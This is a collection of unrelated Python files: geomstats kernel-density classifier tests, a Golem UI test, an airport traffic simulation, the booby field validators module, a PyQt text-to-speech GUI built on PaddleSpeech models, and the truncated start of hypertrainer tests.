def test_predict_proba_uniform_kernel(self):
"""Test the 'predict_proba' class method using the 'uniform' kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel='uniform',
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[0.9, 0.0]]))
expected = gs.array([[1 / 2, 1 / 2]])
self.assertAllClose(expected, result, atol=gs.atol)
def test_predict_proba_distance_kernel(self):
"""Test the 'predict_proba' class method using 'distance' kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel='distance',
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[1.0, 0.0]]))
expected = gs.array([[1, 0]])
self.assertAllClose(expected, result, atol=gs.atol)
@geomstats.tests.np_and_pytorch_only
def test_predict_proba_triangular_kernel(self):
"""Test the 'predict_proba' class method using a triangular kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel=triangular_radial_kernel,
bandwidth=2.0,
p=2,
distance='minkowski')
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[1.0, 0.0]]))
expected = gs.array([[3 / 4, 1 / 4]])
self.assertAllClose(expected, result, atol=gs.atol)
@geomstats.tests.np_and_pytorch_only
def test_predict_proba_triangular_kernel_callable_distance(self):
"""Test the 'predict_proba' class method using a triangular kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel=triangular_radial_kernel,
bandwidth=2.0,
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[1.0, 0.0]]))
expected = gs.array([[3 / 4, 1 / 4]])
self.assertAllClose(expected, result, atol=gs.atol)
@geomstats.tests.np_and_pytorch_only
def test_predict_triangular_kernel_callable_distance(self):
"""Test the 'predict' class method using a triangular kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel=triangular_radial_kernel,
bandwidth=2.0,
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([[1.0, 0.0], [1.0, 0.0]]))
expected = gs.array([0, 0])
self.assertAllClose(expected, result, atol=gs.atol)
def test_predict_hypersphere_distance(self):
"""Test the 'predict' class method using the hypersphere distance."""
dim = 2
space = Hypersphere(dim=dim)
distance = space.metric.dist
training_dataset = gs.array(
[[1, 0, 0],
[3 ** (1 / 2) / 2, 1 / 2, 0],
[3 ** (1 / 2) / 2, - 1 / 2, 0],
[0, 0, 1],
[0, 1 / 2, 3 ** (1 / 2) / 2],
[0, - 1 / 2, 3 ** (1 / 2) / 2]])
labels = [0, 0, 0, 1, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=distance)
kde.fit(training_dataset, labels)
target_dataset = gs.array(
[[2 ** (1 / 2) / 2, 2 ** (1 / 2) / 2, 0],
[0, 1 / 2, - 3 ** (1 / 2) / 2],
[0, - 1 / 2, - 3 ** (1 / 2) / 2],
[- 3 ** (1 / 2) / 2, 1 / 2, 0],
[- 3 ** (1 / 2) / 2, - 1 / 2, 0],
[0, 2 ** (1 / 2) / 2, 2 ** (1 / 2) / 2]])
result = kde.predict(target_dataset)
expected = [0, 0, 0, 1, 1, 1]
self.assertAllClose(expected, result)
def test_predict_poincare_ball_distance(self):
"""Test the 'predict' class method using the Poincare ball distance."""
dim = 2
space = PoincareBall(dim=dim)
distance = space.metric.dist
training_dataset = gs.array(
[[1 / 2, 1 / 4],
[1 / 2, 0],
[1 / 2, - 1 / 4],
[- 1 / 2, 1 / 4],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 4]])
labels = [0, 0, 0, 1, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=distance,
kernel='distance')
kde.fit(training_dataset, labels)
target_dataset = gs.array(
[[1 / 2, 1 / 5],
[1 / 2, 0],
[1 / 2, - 1 / 5],
[- 1 / 2, 1 / 5],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 5]])
result = kde.predict(target_dataset)
expected = [0, 0, 0, 1, 1, 1]
self.assertAllClose(expected, result)
def test_predict_hyperboloid_distance(self):
"""Test the 'predict' class method using the hyperboloid distance."""
dim = 2
space = Hyperboloid(dim=dim)
distance = space.metric.dist
training_dataset_intrinsic = gs.array(
[[1 / 2, 1 / 4],
[1 / 2, 0],
[1 / 2, - 1 / 4],
[- 1 / 2, 1 / 4],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 4]])
training_dataset = space.change_coordinates_system(
training_dataset_intrinsic,
from_coordinates_system='intrinsic',
to_coordinates_system='extrinsic')
labels = [0, 0, 0, 1, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=distance,
kernel='distance')
kde.fit(training_dataset, labels)
target_dataset_intrinsic = gs.array(
[[1 / 2, 1 / 5],
[1 / 2, 0],
[1 / 2, - 1 / 5],
[- 1 / 2, 1 / 5],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 5]])
target_dataset = space.change_coordinates_system(
target_dataset_intrinsic,
from_coordinates_system='intrinsic',
to_coordinates_system='extrinsic')
result = kde.predict(target_dataset)
expected = [0, 0, 0, 1, 1, 1]
self.assertAllClose(expected, result)
|
description = 'Verify the user can add an action to a test and save it successfully'
pages = ['common',
'index',
'tests',
'test_builder']
def setup(data):
common.access_golem(data.env.url, data.env.admin)
index.create_access_project('test')
common.navigate_menu('Tests')
tests.create_access_random_test()
def test(data):
test_builder.add_action(data.action)
test_builder.save_test()
refresh_page()
test_builder.verify_last_action(data.action)
|
# -*- coding: utf-8 -*-
from random import random, choice, choices
from tqdm import tqdm
from models import Context, Aircraft, Airport, City, Time
from data import context, cities, airline, t
from settings import randbool, randgauss, path_number, aircraft_number, people_number_ratio
population = {}
for city in cities:
for airport in city.airports:
population[airport] = [0] * t.DAY*t.HOUR*t.MINUTE
for i in tqdm(range(t.DAY*t.HOUR*t.MINUTE), ascii=True):
# for i in range(t.DAY*t.HOUR*t.MINUTE):
t.elapse()
paths = choices(list(airline), k=path_number(t.is_day()))
for path in paths:
aircrafts = []
if randbool(): path=path[::-1]
number = aircraft_number(t.is_day())
path_ = choice(path[0].airports), choice(path[1].airports)
if (len(list(path_[0].filter(t.is_active))) >= number) \
and (path_[1].capacity-path_[1].aircraft_number > number) \
and number != 0:
times = path_[0].aircraft_leave_for_times(path_[1], number)
for key, val in times.items():
aircrafts.append(key)
t.sleep(key, val)
for aircraft in aircrafts:
population[path_[1]][i] = round(people_number_ratio() * aircraft.capacity)
|
# -*- coding: utf-8 -*-
#
# Copyright 2014 Jaime Gil de Sagredo Luna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The `validators` module contains a set of :mod:`fields` validators.
A validator is any callable `object` which receives a `value` as the
target for the validation. If the validation fails, it should raise an
:class:`errors.ValidationError` exception with an error message.
`Validators` are passed to :class:`fields.Field` and subclasses as positional
arguments.
"""
import re
import collections.abc
import datetime
from booby import errors
from booby.helpers import nullable
class Validator(object):
def __call__(self, value):
self.validate(value)
def validate(self, value):
raise NotImplementedError()
class Required(Validator):
"""This validator forces fields to have a value other than :keyword:`None`."""
def validate(self, value):
if value is None:
raise errors.ValidationError('is required')
class In(Validator):
"""This validator forces fields to have their value in the given list.
:param choices: A `list` of possible values.
"""
def __init__(self, choices):
self.choices = choices
def validate(self, value):
if value not in self.choices:
raise errors.ValidationError('should be in {}'.format(self.choices))
class String(Validator):
"""This validator forces fields values to be an instance of `basestring`."""
@nullable
def validate(self, value):
if not isinstance(value, str):
raise errors.ValidationError('should be a string')
class Integer(Validator):
"""This validator forces fields values to be an instance of `int`."""
@nullable
def validate(self, value):
if not isinstance(value, int):
raise errors.ValidationError('should be an integer')
class Float(Validator):
"""This validator forces fields values to be an instance of `float`."""
@nullable
def validate(self, value):
if not isinstance(value, float):
raise errors.ValidationError('should be a float')
class Boolean(Validator):
"""This validator forces fields values to be an instance of `bool`."""
@nullable
def validate(self, value):
if not isinstance(value, bool):
raise errors.ValidationError('should be a boolean')
class Model(Validator):
"""This validator forces fields values to be an instance of the given
:class:`models.Model` subclass and also performs a validation in the
entire `model` object.
:param model: A subclass of :class:`models.Model`
"""
def __init__(self, model):
self.model = model
@nullable
def validate(self, value):
if not isinstance(value, self.model):
raise errors.ValidationError(
"should be an instance of '{}'".format(self.model.__name__))
value.validate()
class Email(String):
"""This validator forces fields values to be strings and match a
valid email address.
"""
def __init__(self):
super(Email, self).__init__()
        self.pattern = re.compile(r'^[^@]+@[^@]+$')
@nullable
def validate(self, value):
super(Email, self).validate(value)
if self.pattern.match(value) is None:
raise errors.ValidationError('should be a valid email')
class List(Validator):
"""This validator forces field values to be a :keyword:`list`.
    A list of inner :mod:`validators` can also be specified to validate
each list element. For example, to validate a list of
:class:`models.Model` you could do::
books = fields.Field(validators.List(validators.Model(YourBookModel)))
    :param \*validators: A list of inner validators as positional arguments.
"""
def __init__(self, *validators):
self.validators = validators
@nullable
def validate(self, value):
        if not isinstance(value, collections.abc.MutableSequence):
raise errors.ValidationError('should be a list')
for i in value:
for validator in self.validators:
validator(i)
class DateTime(Validator):
@nullable
def validate(self, value):
if not isinstance(value, datetime.datetime):
raise errors.ValidationError('should be a datetime')
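# Usage sketch (illustrative only, not part of the original module): as the
# module docstring says, validators are plain callables that raise
# errors.ValidationError when a value is invalid, and they are passed to
# fields.Field as positional arguments.  The guarded self-check below only
# uses names defined in this module and assumes the booby package is
# importable.
if __name__ == '__main__':
    String()('hello')  # a valid value passes silently
    try:
        Required()(None)  # a missing value should fail
    except errors.ValidationError as error:
        print('validation failed as expected:', error)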
|
import sys
import os
from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QPushButton, QCheckBox, QLineEdit, QMessageBox, QComboBox, QLabel, QFileDialog
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot, QUrl
import sounddevice as sd
# from paddle
import argparse
from pathlib import Path
import numpy as np
import paddle
import soundfile as sf
import yaml
from yacs.config import CfgNode
import sys
sys.path.append("train/frontend")
# from zh_frontend import Frontend
from mixed_frontend import Frontend
sys.path.append("train/models")
from fastspeech2 import FastSpeech2
from speedyspeech import SpeedySpeech
# from paddlespeech.t2s.models.fastspeech2 import FastSpeech2
# from paddlespeech.t2s.models.fastspeech2 import StyleFastSpeech2Inference
from fastspeech2 import StyleFastSpeech2Inference
from speedyspeech import SpeedySpeechInference
from paddlespeech.t2s.models.hifigan import HiFiGANInference
from paddlespeech.t2s.models.parallel_wavegan import PWGInference
import paddlespeech.t2s.models as ttsModels
from paddlespeech.t2s.modules.normalizer import ZScore
from paddlespeech.t2s.datasets.get_feats import LogMelFBank
import librosa
from sklearn.preprocessing import StandardScaler
class App(QMainWindow):
def __init__(self):
super().__init__()
self.title = 'VTuberTalk'
self.left = 10
self.top = 10
self.width = 400
self.height = 320
self.initUI()
self.initModel()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
# Create textbox
self.textbox = QLineEdit(self)
self.textbox.move(20, 20)
self.textbox.resize(360, 40)
# generate button
self.generate_button = QPushButton('合成', self)
self.generate_button.move(20, 80)
self.generate_button.clicked.connect(self.onGenerateButtonClicked)
# play button
self.play_button = QPushButton('重播', self)
self.play_button.move(20, 120)
self.play_button.clicked.connect(self.playAudioFile)
# save button
self.save_button = QPushButton('保存', self)
self.save_button.move(20, 160)
self.save_button.clicked.connect(self.saveWavFile)
# voice combobox
self.voice_label = QLabel(self)
self.voice_label.move(160, 80)
self.voice_label.setText("声音:")
self.voice_combo = QComboBox(self)
self.voice_combo.addItem("阿梓")
self.voice_combo.addItem("海子姐")
self.voice_combo.move(240, 80)
self.voice_combo.resize(120, 40)
self.voice_combo.activated[str].connect(self.onVoiceComboboxChanged)
# tts model
self.tts_style_label = QLabel(self)
self.tts_style_label.move(160, 120)
self.tts_style_label.setText("风格:")
self.tts_style_combo = QComboBox(self)
self.tts_style_combo.addItem("正常")
self.tts_style_combo.addItem("机器楞")
self.tts_style_combo.addItem("高音")
self.tts_style_combo.addItem("低音")
self.tts_style_combo.move(240, 120)
self.tts_style_combo.resize(120, 40)
self.tts_style_combo.activated[str].connect(self.onTTSStyleComboboxChanged)
self.tts_speed_label = QLabel(self)
self.tts_speed_label.move(160, 160)
self.tts_speed_label.setText("速度:")
self.tts_speed_combo = QComboBox(self)
self.tts_speed_combo.addItem("1.0x")
self.tts_speed_combo.addItem("0.8x")
self.tts_speed_combo.addItem("1.2x")
self.tts_speed_combo.addItem("古神")
self.tts_speed_combo.move(240, 160)
self.tts_speed_combo.resize(120, 40)
self.tts_speed_combo.activated[str].connect(self.onTTSSpeedComboboxChanged)
# acoustic model
self.acoustic_model_label = QLabel(self)
self.acoustic_model_label.move(160, 200)
self.acoustic_model_label.setText("模型:")
self.acoustic_model_combo = QComboBox(self)
self.acoustic_model_combo.addItem("gst-fastspeech2")
self.acoustic_model_combo.addItem("fastspeech2")
self.acoustic_model_combo.addItem("gst-speedyspeech")
self.acoustic_model_combo.addItem("speedyspeech")
self.acoustic_model_combo.addItem("vae-fastspeech2")
self.acoustic_model_combo.move(240, 200)
self.acoustic_model_combo.resize(120, 40)
self.acoustic_model_combo.activated[str].connect(self.onAcousticModelComboboxChanged)
# # model path
# self.ref_audio_button = QPushButton('加载模型路径', self)
# self.ref_audio_button.move(20, 200)
# self.ref_audio_button.clicked.connect(self.loadRefWavFile)
# vocoder model
self.voc_model_label = QLabel(self)
self.voc_model_label.move(160, 240)
self.voc_model_label.setText("vocoder:")
self.voc_model_combo = QComboBox(self)
self.voc_model_combo.addItem("parallel wavegan")
self.voc_model_combo.addItem("hifigan")
self.voc_model_combo.move(240, 240)
self.voc_model_combo.resize(120, 40)
self.voc_model_combo.activated[str].connect(self.onVocModelComboboxChanged)
# ref audio
self.ref_audio_button = QPushButton('参考音频', self)
self.ref_audio_button.move(20, 240)
self.ref_audio_button.clicked.connect(self.loadRefWavFile)
self.ref_audio_label = QLabel(self)
self.ref_audio_label.move(160, 280)
self.ref_audio_label.resize(380, 40)
self.ref_audio_label.setText("未加载参考音频")
self.ref_audio_path = ""
self.show()
def initModel(self, tts_model=None):
# settings
# parse args and config and redirect to train_sp
self.ngpu = 0
self.style = "Normal"
self.speed = "1.0xspeed"
self.wav = None
if self.ngpu == 0:
paddle.set_device("cpu")
elif self.ngpu > 0:
paddle.set_device("gpu")
self.voice_cloning = None
self.onVoiceComboboxChanged(self.voice_combo.currentText())
self.onTTSStyleComboboxChanged(self.tts_style_combo.currentText())
self.onTTSSpeedComboboxChanged(self.tts_speed_combo.currentText())
self.onAcousticModelComboboxChanged(self.acoustic_model_combo.currentText())
self.onVocModelComboboxChanged(self.voc_model_combo.currentText())
print("gst,", self.use_gst)
print("vae,", self.use_vae)
def loadFrontend(self):
if self.acoustic_model == "fastspeech2":
self.frontend = Frontend(phone_vocab_path=self.phones_dict)
elif self.acoustic_model == "speedyspeech":
self.frontend = Frontend(phone_vocab_path=self.phones_dict, tone_vocab_path=self.tones_dict)
print("frontend done!")
def loadAcousticModel(self):
# acoustic model
if self.acoustic_model == "fastspeech2":
if self.use_gst:
self.fastspeech2_stat = "exp/gst_fastspeech2_azi_nanami/speech_stats.npy"
self.fastspeech2_pitch_stat = "exp/gst_fastspeech2_azi_nanami/pitch_stats.npy"
self.fastspeech2_energy_stat = "exp/gst_fastspeech2_azi_nanami/energy_stats.npy"
self.phones_dict = "exp/gst_fastspeech2_azi_nanami/phone_id_map.txt"
self.speaker_dict="exp/gst_fastspeech2_azi_nanami/speaker_id_map.txt"
self.fastspeech2_config_path = "exp/gst_fastspeech2_azi_nanami/default_multi.yaml"
self.fastspeech2_checkpoint = "exp/gst_fastspeech2_azi_nanami/checkpoints/snapshot_iter_111150.pdz"
elif self.use_vae:
self.fastspeech2_stat = "exp/vae_fastspeech2_azi_nanami/speech_stats.npy"
self.fastspeech2_pitch_stat = "exp/vae_fastspeech2_azi_nanami/pitch_stats.npy"
self.fastspeech2_energy_stat = "exp/vae_fastspeech2_azi_nanami/energy_stats.npy"
self.phones_dict = "exp/vae_fastspeech2_azi_nanami/phone_id_map.txt"
self.speaker_dict="exp/vae_fastspeech2_azi_nanami/speaker_id_map.txt"
self.fastspeech2_config_path = "exp/gst_fastspeech2_azi_nanami/default_multi.yaml"
self.fastspeech2_checkpoint = "exp/fastspeech2_bili3_aishell3/checkpoints/snapshot_iter_165560.pdz"
else:
self.fastspeech2_stat = "exp/fastspeech2_bili3_aishell3_ljspeech/speech_stats.npy"
self.fastspeech2_pitch_stat = "exp/fastspeech2_bili3_aishell3_ljspeech/pitch_stats.npy"
self.fastspeech2_energy_stat = "exp/fastspeech2_bili3_aishell3_ljspeech/energy_stats.npy"
self.phones_dict = "exp/fastspeech2_bili3_aishell3_ljspeech/phone_id_map.txt"
self.speaker_dict="exp/fastspeech2_bili3_aishell3_ljspeech/speaker_id_map.txt"
self.fastspeech2_config_path = "exp/fastspeech2_bili3_aishell3_ljspeech/default_multi.yaml"
self.fastspeech2_checkpoint = "exp/fastspeech2_bili3_aishell3_ljspeech/checkpoints/snapshot_iter_165560.pdz"
with open(self.fastspeech2_config_path) as f:
self.fastspeech2_config = CfgNode(yaml.safe_load(f))
elif self.acoustic_model == "speedyspeech":
self.speedyspeech_config_path = "exp/speedyspeech_azi_nanami_new/default_multi.yaml"
self.speedyspeech_checkpoint = "exp/speedyspeech_azi_nanami_new/checkpoints/snapshot_iter_24037.pdz"
self.speedyspeech_stat = "exp/speedyspeech_azi_nanami_new/feats_stats.npy"
self.tones_dict = "exp/speedyspeech_azi_nanami_new/tone_id_map.txt"
self.phones_dict = "exp/speedyspeech_azi_nanami_new/phone_id_map.txt"
self.speaker_dict="exp/speedyspeech_azi_nanami_new/speaker_id_map.txt"
with open(self.speedyspeech_config_path) as f:
self.speedyspeech_config = CfgNode(yaml.safe_load(f))
fields = ["utt_id", "text"]
self.spk_num = None
if self.speaker_dict:
print("multiple speaker")
with open(self.speaker_dict, 'rt') as f:
spk_id_list = [line.strip().split() for line in f.readlines()]
self.spk_num = len(spk_id_list)
fields += ["spk_id"]
elif self.voice_cloning:
print("voice cloning!")
fields += ["spk_emb"]
else:
print("single speaker")
print("spk_num:", self.spk_num)
with open(self.phones_dict, "r", encoding='UTF-8') as f:
phn_id = [line.strip().split() for line in f.readlines()]
vocab_size = len(phn_id)
print("vocab_size:", vocab_size)
if self.acoustic_model == "fastspeech2":
print("fastspeech2")
odim = self.fastspeech2_config.n_mels
self.model = FastSpeech2(
idim=vocab_size, odim=odim, **self.fastspeech2_config["model"], spk_num=self.spk_num, use_gst=self.use_gst, use_vae=self.use_vae)
self.model.set_state_dict(
paddle.load(self.fastspeech2_checkpoint)["main_params"])
self.model.eval()
print("fastspeech2 model done!")
elif self.acoustic_model == "speedyspeech":
print("speedyspeech")
tone_size = None
if self.tones_dict:
with open(self.tones_dict, "r") as f:
tone_id = [line.strip().split() for line in f.readlines()]
tone_size = len(tone_id)
print("tone_size:", tone_size)
if self.use_gst:
self.messageDialog("暂时不支持")
return
else:
self.model = SpeedySpeech(
vocab_size=vocab_size, tone_size=tone_size, spk_num=self.spk_num, **self.speedyspeech_config["model"])
self.model.set_state_dict(
paddle.load(self.speedyspeech_checkpoint)["main_params"])
self.model.eval()
print("speedyspeech model done!")
def loadVocoderModel(self):
# vocoder
class_map = {
"hifigan": "HiFiGANGenerator",
"mb_melgan": "MelGANGenerator",
"pwgan": "PWGGenerator",
"style_melgan": "StyleMelGANGenerator",
}
if self.vocoder == "pwg":
self.pwg_config_path = "pretrained_models/pwg_aishell3_ckpt_0.5/default.yaml"
self.pwg_checkpoint = "pretrained_models/pwg_aishell3_ckpt_0.5/snapshot_iter_1000000.pdz"
self.pwg_stat = "pretrained_models/pwg_aishell3_ckpt_0.5/feats_stats.npy"
with open(self.pwg_config_path) as f:
self.pwg_config = CfgNode(yaml.safe_load(f))
checkpoint = self.pwg_checkpoint
config = self.pwg_config
generator_type = "pwgan"
elif self.vocoder == "hifigan":
self.hifigan_config_path = "pretrained_models/hifigan_azi_nanami/default.yaml"
self.hifigan_checkpoint = "pretrained_models/hifigan_azi_nanami/checkpoints/snapshot_iter_310000.pdz"
self.hifigan_stat = "pretrained_models/hifigan_azi_nanami/feats_stats.npy"
with open(self.hifigan_config_path) as f:
self.hifigan_config = CfgNode(yaml.safe_load(f))
checkpoint = self.hifigan_checkpoint
config = self.hifigan_config
generator_type = "hifigan"
generator_class = getattr(ttsModels,
class_map[generator_type])
self.generator = generator_class(**config["generator_params"])
state_dict = paddle.load(checkpoint)
self.generator.set_state_dict(state_dict["generator_params"])
self.generator.remove_weight_norm()
self.generator.eval()
print("vocoder model done!")
@pyqtSlot()
def onGenerateButtonClicked(self):
if self.ref_audio_path == "" and (self.use_gst or self.use_vae):
self.messageDialog("请先选择参考音频!")
return
textboxValue = self.textbox.text()
if textboxValue == "":
self.messageDialog("输入不能为空!")
return
sentences = []
sentences.append(("001", textboxValue))
if self.acoustic_model == "fastspeech2":
stat = np.load(self.fastspeech2_stat)
mu, std = stat
mu = paddle.to_tensor(mu)
std = paddle.to_tensor(std)
fastspeech2_normalizer = ZScore(mu, std)
elif self.acoustic_model == "speedyspeech":
stat = np.load(self.speedyspeech_stat)
mu, std = stat
mu = paddle.to_tensor(mu)
std = paddle.to_tensor(std)
speedyspeech_normalizer = ZScore(mu, std)
if self.vocoder == "pwg":
stat = np.load(self.pwg_stat)
elif self.vocoder == "hifigan":
stat = np.load(self.hifigan_stat)
mu, std = stat
mu = paddle.to_tensor(mu)
std = paddle.to_tensor(std)
vocoder_normalizer = ZScore(mu, std)
if self.acoustic_model == "fastspeech2":
fastspeech2_inference = StyleFastSpeech2Inference(
fastspeech2_normalizer, self.model, self.fastspeech2_pitch_stat,
self.fastspeech2_energy_stat)
fastspeech2_inference.eval()
elif self.acoustic_model == "speedyspeech":
speedyspeech_inference = SpeedySpeechInference(
speedyspeech_normalizer, self.model)
speedyspeech_inference.eval()
if self.vocoder == "pwg":
vocoder_inference = PWGInference(vocoder_normalizer, self.generator)
elif self.vocoder == "hifigan":
vocoder_inference = HiFiGANInference(vocoder_normalizer, self.generator)
vocoder_inference.eval()
robot = False
durations = None
durations_scale = None
durations_bias = None
pitch = None
pitch_scale = None
pitch_bias = None
energy = None
energy_scale = None
energy_bias = None
if self.tts_style_combo.currentText() == "机器楞":
self.style = "robot"
elif self.tts_style_combo.currentText() == "高音":
self.style = "high_voice"
elif self.tts_style_combo.currentText() == "低音":
self.style = "low_voice"
if self.tts_speed_combo.currentText() == "1.2x":
self.speed = "1.2xspeed"
elif self.tts_speed_combo.currentText() == "0.8x":
self.speed = "0.8xspeed"
elif self.tts_speed_combo.currentText() == "古神":
self.speed = "3.0xspeed"
if self.style == "robot":
            # all tones in phones should be `1`
            # all pitch values should be the same; the mean is used here
robot = True
if self.speed == "1.2xspeed":
durations_scale = 1.2
elif self.speed == "1.0xspeed":
durations_scale = 1
elif self.speed == "0.8xspeed":
durations_scale = 0.8
elif self.speed == "3.0xspeed":
durations_scale = 3.0
if self.style == "high_voice":
pitch_scale = 1.3
elif self.style == "low_voice":
pitch_scale = 0.7
elif self.style == "normal":
pitch_scale = 1
record = None
try:
wav, _ = librosa.load(str(self.ref_audio_path), sr=self.fastspeech2_config.fs)
if len(wav.shape) != 1 or np.abs(wav).max() > 1.0:
return record
            assert len(wav.shape) == 1, "ref audio is not a mono-channel audio."
            assert np.abs(wav).max() <= 1.0, "ref audio does not seem to be 16-bit PCM."
mel_extractor = LogMelFBank(
sr=self.fastspeech2_config.fs,
n_fft=self.fastspeech2_config.n_fft,
hop_length=self.fastspeech2_config.n_shift,
win_length=self.fastspeech2_config.win_length,
window=self.fastspeech2_config.window,
n_mels=self.fastspeech2_config.n_mels,
fmin=self.fastspeech2_config.fmin,
fmax=self.fastspeech2_config.fmax)
logmel = mel_extractor.get_log_mel_fbank(wav)
# normalize, restore scaler
speech_scaler = StandardScaler()
speech_scaler.mean_ = np.load(self.fastspeech2_stat)[0]
speech_scaler.scale_ = np.load(self.fastspeech2_stat)[1]
speech_scaler.n_features_in_ = speech_scaler.mean_.shape[0]
logmel = speech_scaler.transform(logmel)
speech = paddle.to_tensor(logmel)
        except Exception:
speech = None
for utt_id, sentence in sentences:
if self.acoustic_model == "fastspeech2":
input_ids = self.frontend.get_input_ids(
sentence, merge_sentences=True, robot=robot)
elif self.acoustic_model == "speedyspeech":
input_ids = self.frontend.get_input_ids(
sentence, merge_sentences=True, get_tone_ids=True)
try:
phone_ids = input_ids["phone_ids"][0]
            except Exception:
self.messageDialog("输入的文字不能识别,请重新输入!")
return
print("self.spk_id", self.spk_id)
self.spk_id = paddle.to_tensor(self.spk_id)
# self.spk_id = None # temp
with paddle.no_grad():
if self.acoustic_model == "fastspeech2":
mel = fastspeech2_inference(
phone_ids,
durations_scale=durations_scale,
durations_bias=durations_bias,
pitch_scale=pitch_scale,
pitch_bias=pitch_bias,
energy_scale=energy_scale,
energy_bias=energy_bias,
robot=robot,
spk_id=self.spk_id,
speech=speech,
)
elif self.acoustic_model == "speedyspeech":
tone_ids = paddle.to_tensor(input_ids["tone_ids"][0])
mel = speedyspeech_inference(
phone_ids,
tone_ids,
spk_id=self.spk_id
)
print("mel infer done")
self.wav = vocoder_inference(mel)
print("vocoder infer done")
print(f"{self.style}_{utt_id} done!")
self.playAudioFile()
def saveWavFile(self):
        if self.wav is not None:
dialog = QFileDialog()
dialog.setDefaultSuffix(".wav")
fpath, _ = dialog.getSaveFileName(
parent=self,
caption="Select a path to save the audio file",
filter="Audio Files (*.flac *.wav)"
)
if fpath:
if Path(fpath).suffix == "":
fpath += ".wav"
sf.write(fpath, self.wav.numpy(), samplerate=self.fastspeech2_config.fs)
else:
self.messageDialog("还没有合成声音,无法保存!")
def loadRefWavFile(self):
'''
        setFileMode():
        QFileDialog.AnyFile: any file
        QFileDialog.ExistingFile: an existing file
        QFileDialog.Directory: a directory
        QFileDialog.ExistingFiles: multiple existing files
'''
dialog = QFileDialog()
dialog.setFileMode(QFileDialog.ExistingFile)
# dlg.setFilter(QDir.Files)
if dialog.exec_():
filenames= dialog.selectedFiles()
self.ref_audio_path = filenames[0]
self.ref_audio_label.setText("已加载:" + os.path.basename(filenames[0]))
def onVoiceComboboxChanged(self, text):
if text == "阿梓":
self.spk_id = 175
elif text == "海子姐":
self.spk_id = 176
def onTTSStyleComboboxChanged(self, text):
if text == "正常":
self.style = "normal"
elif text == "机器楞":
self.style = "robot"
elif text == "高音":
self.style = "high_voice"
elif text == "低音":
self.style = "low_voice"
def onTTSSpeedComboboxChanged(self, text):
if text == "1.0x":
self.speed = "1.0xspeed"
elif text == "1.2x":
self.speed = "1.2xspeed"
elif text == "0.8x":
self.speed = "0.8xspeed"
elif text == "古神":
self.speed = "3.0xspeed"
def onAcousticModelComboboxChanged(self, text):
if text == "gst-fastspeech2":
self.acoustic_model = "fastspeech2"
self.use_gst = True
self.use_vae = False
elif text == "fastspeech2":
self.acoustic_model = "fastspeech2"
self.use_gst = False
self.use_vae = False
elif text == "gst-speedyspeech":
self.messageDialog("暂不支持")
return
elif text == "speedyspeech":
self.acoustic_model = "speedyspeech"
self.use_gst = False
elif text == "vae-fastspeech2":
self.acoustic_model = "fastspeech2"
self.use_vae = True
self.use_gst = False
self.onVoiceComboboxChanged(self.voice_combo.currentText())
self.loadAcousticModel()
self.loadFrontend()
def onVocModelComboboxChanged(self, text):
if text == "parallel wavegan":
self.vocoder = "pwg"
elif text == "hifigan":
self.vocoder = "hifigan"
self.loadVocoderModel()
def playAudioFile(self):
        if self.wav is None:
self.messageDialog("请先合成音频!")
return
try:
sd.stop()
sd.play(self.wav, self.fastspeech2_config.fs)
except Exception as e:
print(e)
self.log("Error in audio playback. Try selecting a different audio output device.")
self.log("Your device must be connected before you start the toolbox.")
def messageDialog(self, text):
msg_box = QMessageBox(QMessageBox.Warning, '错误', text)
msg_box.exec_()
# def onClickedGST(self):
# if self.use_gst_button.isChecked():
# self.use_gst = True
# else:
# self.use_gst = False
# self.loadAcousticModel()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
    sys.exit(app.exec_())
|
import os
from pathlib import Path
from time import sleep
import pytest
# Trick for initializing a test database
from hypertrainer.utils import TaskStatus, yaml, deep_assert_equal, TestState
TestState.test_mode = True
from hypertrainer.experimentmanager import experiment_manager
from hypertrainer.computeplatformtype import ComputePlatformType
from hypertrainer.htplatform import HtPlatform
from hypertrainer.task import Task
scripts_path = Path(__file__).parent / 'scripts'
# Make sure we will work on a separate, empty test database
assert Task.select().count() == 0, 'Must work on empty test db'
def test_export_yaml():
experiment_manager.create_tasks(
config_file=str(scripts_path / 'test_hp.yaml'),
platform='local')
tmpfile = Path('/tmp/httest.yaml')
if tmpfile.exists():
tmpfile.unlink()
experiment_manager.export_yaml(str(tmpfile))
# TODO perform more checks
class TestLocal:
